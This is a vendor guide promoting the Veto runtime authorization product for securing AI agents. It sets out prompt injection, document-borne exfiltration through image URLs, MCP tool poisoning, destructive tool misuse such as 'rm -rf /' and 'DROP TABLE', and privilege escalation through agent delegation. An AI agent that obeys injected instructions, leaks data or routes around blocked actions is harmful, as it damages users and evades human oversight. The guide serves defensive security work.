Security for agents that take action
AI agents do not just generate text. They execute code, move money, delete data, and send emails. Securing them requires a different control model than securing chatbots. This is for platform and security teams deploying agents into production.
Last updated: May 20, 2026
What is AI agent security?
AI agent security is the discipline of protecting autonomous AI systems that interact with external tools, APIs, and data stores from being exploited, manipulated, or misused. It spans threat modeling, policy definition, runtime enforcement, and post-incident analysis. Unlike traditional application security, agent security must account for non-deterministic decision-making by the AI model itself.
1. The AI agent threat landscape
The shift from chatbots to agents changed the security equation. A chatbot produces text. An agent produces actions. When you give an LLM the ability to call tools, you have introduced an actor in your system with delegated privileges at machine speed.
Enterprise software is moving from assistants that suggest actions to agents that take them. The inventory problem now moves faster than static review. Teams can often name the model and the app, but not the policy that decides whether a proposed tool call should run.
The common production gap: agents are authenticated, but their tool calls are not authorized at runtime. They have API keys that grant identity, but no policy check that governs behavior. Authentication answers "who is this?" Authorization answers "what can it do?" Agent deployments often have the first but not the second.
Traditional software security
- -Deterministic behavior
- -Code review catches implementation bugs
- -Input validation at known boundaries
- -Static RBAC can be enough
AI agent security
- -Non-deterministic decisions
- -Same input can produce different tool calls
- -Attack surface includes natural language
- -Requires runtime tool-call authorization
2. Attack taxonomy: how agents get exploited
OWASP's Agentic Security Initiative and the OWASP Top 10 for Agentic Applications 2026 document the main AI-agent risk families. We have organized the relevant risks into four categories that map to the tool-call boundary where authorization operates.
Prompt injection
The most widely discussed attack vector. An adversary embeds instructions in data the agent processes, such as a web page, an email, or a database record, causing the agent to execute unintended actions. Direct injection manipulates the agent's own prompt. Indirect injection poisons the data the agent retrieves.
A shared document can carry hidden instructions that cause an agent to exfiltrate user data through a rendered image URL. The agent fetches the document, processes the hidden instruction, and encodes private information in an outbound request, all within its normal operating parameters.
Operational consequence for authorization: Prompt injection does not need to be solved at the model level alone. If the agent is blocked from executing the destructive action (exfiltrating data, calling unauthorized APIs), the impact is contained on the governed path even if the model was manipulated.
Tool abuse and misuse
Agents are given tools: file system access, shell execution, API calls, database queries. Tool abuse occurs when an agent uses a legitimate tool in an unauthorized way: runningrm -rf / when it was given shell access for build scripts, or executingDROP TABLE when it was given database access for read queries.
A coding agent with legitimate database credentials can still attempt a destructive operation. The problem is not authentication. The tool is real, the credentials are valid, and the action still needs authorization before execution.
Operational consequence for authorization: Tool-level authorization evaluates not just which tools the agent can call, but what arguments are permitted. Allowing SELECT but blocking DROP is the kind of granular control that static permissions cannot provide.
Data exfiltration
Agents with access to sensitive data can be manipulated, or can independently decide, to transmit that data to unauthorized destinations. This includes encoding data in API request parameters, writing it to external services, embedding it in generated code, or leaking it through side channels like image URLs.
The risk is acute in healthcare (PHI under HIPAA), finance (PCI DSS cardholder data), and legal (attorney-client privileged information). An agent with read access to an EHR system and write access to an email API has enough access to cause a reportable breach.
Operational consequence for authorization: Output redaction and destination whitelisting at the tool-call level can block matched data from leaving the authorized perimeter. The agent can read patient records to answer questions, but the authorization boundary can stop or redact PHI before outbound actions on the governed path.
Privilege escalation
Multi-agent systems introduce delegation chains where one agent invokes another. A low-privilege agent can request a high-privilege agent to perform actions on its behalf, effectively escalating its own permissions. Without authorization checks at governed hops, the delegation chain becomes an escalation path.
This is analogous to the confused deputy problem in traditional security, but amplified by the non-deterministic nature of LLM reasoning. An agent that discovers it can ask another agent to perform a blocked action may do so without being explicitly instructed to; it is just "solving the problem" it was given.
Operational consequence for authorization: Per-agent, tool-call authorization with delegation tracking keeps downstream agents within the permissions of the original caller. The authorization boundary is enforced at governed tool calls in the chain, not just the first one.
3. Real-world incidents
Agent security is the boundary between a model's plan and a real side effect. These examples show where runtime authorization belongs.
Coding agent attempts destructive database operation
Failure modeA coding agent with full database credentials can pass authentication and still attempt a destructive operation. Runtime authorization checks the actual command before the database sees it.
Document-borne data exfiltration
Indirect injectionA prompt injection hidden in a document can steer an agent to encode private information in a rendered image URL, sending it to an attacker-controlled server as part of normal document processing.
ChatGPT plugin SSRF and data leakage
2023-2024Multiple ChatGPT plugins were found to be vulnerable to server-side request forgery (SSRF). Attackers could craft prompts that caused the agent to make requests to internal network addresses, bypassing firewall rules. The plugins acted as proxies into private infrastructure.
MCP tool poisoning attacks
2025Malicious MCP servers can inject hidden instructions into tool descriptions that are invisible to the user but processed by the LLM, steering the agent toward data exfiltration, code changes, or unauthorized commands.
4. Security frameworks: NIST AI RMF and OWASP
Two frameworks give practical guidance for AI agent security. Understanding them is essential for building a defensible security posture and communicating risk to leadership.
NIST AI Risk Management Framework (AI 100-1)
The NIST AI RMF organizes risk management into four functions: Govern, Map, Measure, and Manage. For AI agents that can act, the critical functions are:
GOVERN
Establish policies and accountability structures for AI agent deployment. Define who can deploy agents, what permissions they start with, and who approves escalation.
MAP
Identify and categorize risks specific to each agent's tool set. An agent with file system access has different risks than one with email access. Map tools to threat categories.
MEASURE
Quantify agent risk through monitoring. Track tool-call frequency, denied actions, approval response times, and policy violation trends. Measure what your agents do.
MANAGE
Enforce policies at runtime. This is where authorization lives: intercepting, evaluating, and controlling each governed tool call against defined policy. The enforcement function.
OWASP Top 10 for Agentic Applications (2026)
OWASP's Agentic Security Initiative identifies critical risks in agentic applications. These representative risk families show where runtime authorization helps:
5. Defense-in-depth: the five layers
No single control secures an agent. Defense-in-depth means applying controls at multiple layers, so that a failure at one layer has another control behind it. Organizations often have layers 1-3 but still need layer 4: runtime authorization at the tool-call enforcement point.
Model-level controls
System prompts, Constitutional AI, RLHF. These shape model behavior but cannot enforce it. The model can ignore, misinterpret, or be manipulated past these controls. Necessary but insufficient.
Input validation
Prompt injection detection, input sanitization, content filtering. Catches known attack patterns in user input. Cannot catch novel attacks, indirect injections from fetched data, or misuse that does not involve malicious input at all.
Network and infrastructure
Firewalls, VPCs, network segmentation, secrets management. Limits where agents can reach at the network level. Coarse-grained: can block entire hosts but not specific operations on allowed hosts.
Runtime authorization
Policy enforcement at the tool-call boundary. Checks governed calls, evaluates them against declarative policy, and allows, denies, or routes to human approval. Operates independently of the model's reasoning. Not delegated to prompt text because the model does not control the authorization check. This is what Veto provides.
Monitoring and response
Logging, alerting, anomaly detection, incident response. Essential for visibility but reactive by nature: it tells you what happened after the fact. Without layer 4, monitoring alone can become documentation after damage rather than control before execution.
7. Implementing agent security with Veto
Veto is the runtime authorization path for AI agents. It checks tool calls before they run, intercepting governed tool calls, evaluating them against declarative policy, and enforcing allow, deny, or approval decisions. The agent's code does not change. The model is unaware it is being governed.
Policy-as-code
Declarative YAML policies stored in your repository. Version-controlled, reviewable, auditable. Define what each agent can do with surgical precision, down to specific tool arguments and parameter ranges.
Human review
Route review-required actions to human approval. Configurable escalation through your review channel or workspace. The agent pauses until a human approves or denies. Decision record for governed decision and its outcome.
Tool-boundary integration
Fits OpenAI, Claude, Gemini, Vercel AI SDK, Mastra, Playwright, MCP, and custom TypeScript dispatch paths. The authorization boundary wraps your tools, not your agent.
Decision records
Each governed decision is recorded: tool name, arguments, policy matched, outcome, timestamp, agent identity, delegation chain. Queryable via workspace, exportable for SOC 2, HIPAA, GDPR, and EU AI Act evidence reporting.
8. Agent security maturity model
Where does your organization fall? Agent deployments often remain at Level 1 or 2. The gap between "authenticated" and "authorized" is where incidents happen.
No controls
Agents run with full tool access. No authentication, no authorization, no logging. Common in prototypes and hackathon projects that quietly reach production.
Authentication only
Agents have API keys and identity verification. You know who the agent is. You do not control what it can do. This is the common gap between identity and authorization.
Prompt-based guardrails
System prompts include instructions like "never delete files" and "always ask before sending emails." These are suggestions, not enforcement. The model can ignore them, and prompt injection can override them.
Runtime authorization
Declarative policies enforce authorization at the tool-call boundary. Governed calls are evaluated before execution. Review-required actions route to human approval. Governed decisions are logged. This is where Veto operates.
Continuous governance
At this layer, teams test policies, watch drift, and report evidence from observed agent behavior. Veto provides the decision records, policy versions, and reviewer trail those programs need.
Further reading
Attacker text embedded in inputs that hijacks an agent's tool plan.
Indirect prompt injectionPayloads delivered through retrieved documents, web pages, or third-party tools.
OWASP LLM06Excessive agency: a core risk Veto's tool-call gating helps mitigate.
Contain prompt injectionDefenses for injection that hold up when contacted with real user input.
Block data exfiltrationStop agents from leaking secrets through email, web, or external APIs.
NIST AI RMFMap Veto's controls to the GOVERN, MAP, MEASURE, and MANAGE functions.
For security engineersThreat models, mitigations, and the artifacts you need for review.
Frequently asked questions
What is AI agent security?
How is AI agent security different from LLM security?
Can prompt engineering solve agent security?
What is the OWASP Top 10 for Agentic Applications?
How does NIST AI RMF apply to AI agents?
What frameworks does Veto work with?
Can does not mean may. Enforce it.